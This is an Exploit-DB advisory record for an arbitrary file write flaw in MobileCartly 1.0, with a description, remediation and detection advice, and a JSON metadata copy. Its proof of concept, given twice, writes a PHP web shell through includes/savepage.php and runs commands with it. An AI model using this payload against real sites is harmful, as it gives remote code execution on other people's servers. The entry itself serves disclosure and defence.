ID EDB-ID:20422
Type exploitdb
Reporter Yakir Wizman
Modified 2012-08-10T00:00:00
Description
MobileCartly 1.0 - Arbitrary File Write Vulnerability. Webapps exploit for php platform
# -----------------------------------------------------------
# _____ _ _ _ _
# / ____(_) | | | | |
# | | _| |_ __ _ __| | ___| |
# | | | | __/ _` |/ _` |/ _ \ |
# | |____| | || (_| | (_| | __/ |
# \_____|_|\__\__,_|\__,_|\___|_|
#
# -----------------------------------------------------------
# MobileCartly 1.0 Arbitrary File Write Vulnerability
# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
# Date 10/08/2012 (DD/MM/YYYY, i.e. 10 August 2012)
# Download - http://mobilecartly.com/mobilecartly.zip
# ISRAEL
# -----------------------------------------------------------
# Author will not be responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
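# The application is prone to an arbitrary file write / overwrite vulnerability.
# Judging from the PoC below, includes/savepage.php writes the request-supplied
# 'pagecontent' value to a file named by the 'savepage' parameter under pages/,
# apparently without authentication or any restriction on the file name or extension.
# Because pages/ is served by the web server, a written .php file is executed when
# requested, so the file write amounts to remote code execution.
# Remediation: require an authenticated admin session for savepage.php, restrict
# 'savepage' to a plain base name with a fixed non-executable extension, and disable
# script execution in pages/.
# Detection: look for requests to includes/savepage.php whose 'savepage' value has a
# script extension, and for unexpected new or modified files under pages/.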
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE
# FILENAME for example 'shell.php'
# CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'
# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir
# -----------------------------------------------------------
{"id": "EDB-ID:20422", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MobileCartly 1.0 - Arbitrary File Write Vulnerability", "description": "MobileCartly 1.0 - Arbitrary File Write Vulnerability. Webapps exploit for php platform", "published": "2012-08-10T00:00:00", "modified": "2012-08-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/20422/", "reporter": "Yakir Wizman", "references": [], "cvelist": [], "lastseen": "2016-02-02T14:13:26", "viewCount": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-02T14:13:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-02T14:13:26", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://www.exploit-db.com/download/20422/", "sourceData": "# -----------------------------------------------------------\r\n#\t\t\t _____ _ _ _ _ \r\n#\t\t\t / ____(_) | | | | |\r\n#\t\t\t | | _| |_ __ _ __| | ___| |\r\n#\t\t\t | | | | __/ _` |/ _` |/ _ \\ |\r\n#\t\t\t | |____| | || (_| | (_| | __/ |\r\n#\t\t\t \\_____|_|\\__\\__,_|\\__,_|\\___|_|\r\n#\t\t\t \r\n# -----------------------------------------------------------\r\n# MobileCartly 1.0 Arbitrary File Write Vulnerability\r\n# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>\r\n# Date 10/08/2012\r\n# Download - http://mobilecartly.com/mobilecartly.zip\r\n# ISRAEL\r\n# -----------------------------------------------------------\r\n#\t\tAuthor will be not responsible for any damage.\r\n# -----------------------------------------------------------\r\n# I. DESCRIPTION\r\n# -----------------------------------------------------------\r\n# The application is prone to arbitrary file write / overwrite vulnerability.\r\n#\r\n# -----------------------------------------------------------\r\n# II. 
PoC EXPLOIT\r\n# -----------------------------------------------------------\r\n# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE\r\n# FILENAME for example 'shell.php'\r\n# CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'\r\n# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir\r\n# -----------------------------------------------------------", "osvdbidlist": ["85509"]}
{}